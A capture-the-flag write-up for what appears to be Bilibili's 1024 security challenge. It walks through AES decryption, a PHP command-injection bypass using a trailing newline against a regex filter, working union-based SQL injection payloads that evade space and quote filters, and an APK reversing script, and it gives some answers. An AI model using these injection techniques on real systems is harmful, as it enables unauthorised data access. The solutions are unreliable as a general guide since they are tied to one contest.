Challenge address: https://www.bilibili.com/blackboard/20211024.html
Topic 1
AES decryption, password: happy_1024_2233. The ciphertext is the bottom two lines of characters, which need to be joined into one line (I really didn't expect this at first!)
Online decryption website: http://tool.chacuo.net/cryptaes
Topic 2
Press F12 and find the hidden flag in home.vue
Topic 3
Download the compressed package and extract it to get eval.php
<?php
/*
  bilibili- ( ゜- ゜)つロ Cheers~
  uat: http://192.168.3.2/uat/eval.php
  pro: http://security.bilibili.com/sec1024/q/pro/eval.php
*/
$args = @$_GET['args'];
if (count($args) >3) {
    exit();
}
for ( $i=0; $i<count($args); $i++ ){
    if ( !preg_match('/^\w+$/', $args[$i]) ) {
        exit();
    }
}
// todo: other filter
$cmd = "/bin/2233 " . implode(" ", $args);
exec($cmd, $out);
for ($i=0; $i<count($out); $i++){
    echo($out[$i]);
    echo('<br>');
}
?>
The general idea is to pass a command in through the args parameter to find the flag. The args array is limited to 3 elements, and the regular expression /^\w+$/ filters out special characters such as / and . The arguments are also appended to /bin/2233, so a command cannot be executed directly. This can be bypassed with a trailing line break (%0a), because $ in the pattern also matches just before a final newline, and then the command can be executed.
ls lists the files in the current directory
cat passwd gets the flag
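The anchoring issue described above, with the check from eval.php beside a stricter one. This is an added example, not part of the original eval.php; the function names weak_is_word, strict_is_word and build_cmd are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example: function names are hypothetical, sample inputs are constructed.

// Check as written in eval.php: "$" also matches just before a final "\n".
function weak_is_word(string $s): bool {
    return preg_match('/^\w+$/', $s) === 1;
}

// Hardened: \A and \z anchor to the absolute start and end of the subject,
// and the character class is spelled out so it does not depend on locale or /u.
function strict_is_word(string $s): bool {
    return preg_match('/\A[A-Za-z0-9_]+\z/', $s) === 1;
}

// Validate the whole args value and build the command line.
// Returns null when the input is rejected.
function build_cmd($args, callable $check): ?string {
    if (!is_array($args) || count($args) > 3) {
        return null;
    }
    $parts = [];
    foreach ($args as $a) {
        if (!is_string($a) || !$check($a)) {
            return null;
        }
        // Defense in depth: quote each argument even after validation.
        $parts[] = escapeshellarg($a);
    }
    return '/bin/2233 ' . implode(' ', $parts);
}

// Constructed samples: a plain word, a word with a trailing newline
// (what %0a decodes to), and a value containing a slash.
$samples = [['abc'], ["abc\n"], ['a/b']];
foreach ($samples as $args) {
    printf(
        "%-10s weak=%-8s strict=%s\n",
        json_encode($args[0]),
        build_cmd($args, 'weak_is_word') === null ? 'reject' : 'accept',
        build_cmd($args, 'strict_is_word') === null ? 'reject' : 'accept'
    );
}
```

The D modifier (/^\w+$/D) is an alternative to \z for making $ match only at the very end of the subject.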
Topic 4
The address is the same as topic 2, but I had no idea at first. Later, I got a hint about SQL injection. Using F12 again, I found an API interface that takes some parameters for submitting log information through POST.
There is an injection point at user_name, and spaces are filtered.
Get the database name: q
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,database()", "action": "", "page": 1, "size": 20 }
Get the table names: flag, log, user
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()", "action": "", "page": 1, "size": 20 }
Get the column name: id (quotation marks cannot be used here, otherwise the string is closed early, resulting in an error. This can be bypassed with hexadecimal: the hexadecimal of flag is 666c6167, prefixed with 0x)
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167", "action": "", "page": 1, "size": 20 }
The last step is to get the flag
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(id)/**/from/**/flag", "action": "", "page": 1, "size": 20 }
Topic 5
Download test.apk and enter an account name and password; after submitting, it prompts "a little ~ ~"
Does it give the flag when the input is correct? I have gradually forgotten the question. This question tests reverse analysis~
Refer to other solutions below:
Open it with JADX
Encrypt is the encryption routine. For the two strings in MainActivity, just apply the reverse of the operations in encrypt once: one base64 decoding, then one XOR with 3, and the two results can be combined into the flag string
Problem solving script
import base64

# The two strings from MainActivity, stored as ASCII codes of base64 text
obyteArray = [0x59, 0x57, 0x42, 0x6c, 0x4f, 0x6d, 0x5a, 0x6e, 0x4e, 0x6a, 0x41, 0x75, 0x4f, 0x6d, 0x4a, 0x6d, 0x4e, 0x7a, 0x41, 0x78, 0x4f, 0x32, 0x59, 0x3d]
code = [0x4e, 0x6a, 0x49, 0x31, 0x4f, 0x7a, 0x41, 0x33, 0x59, 0x47, 0x41, 0x75, 0x4e, 0x6a, 0x4e, 0x6d, 0x4e, 0x7a, 0x63, 0x37, 0x59, 0x6d, 0x55, 0x3d]

# Rebuild the base64 text from the byte values
user = ""
password = ""
for i in range(24):
    user += chr(obyteArray[i])
    password += chr(code[i])
print(base64.b64decode(user))
print(base64.b64decode(password))

# Reverse step 1: base64 decoding (24 base64 characters give 17 bytes)
a1 = str(base64.b64decode(user), encoding="utf-8")
a2 = str(base64.b64decode(password), encoding="utf-8")

# Reverse step 2: XOR each character with 3
ans = ""
ans1 = ""
for i1 in range(17):
    p = ord(a1[i1]) ^ 3
    ans += chr(p)
    p1 = ord(a2[i1]) ^ 3
    ans1 += chr(p1)
print(ans)
print(ans1)
Topic 6
Refer to: https://www.52pojie.cn/thread-1532604-1-1.html
Topic 7
For log analysis, you need to find out all malicious IP addresses. Some answers are as follows:
jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg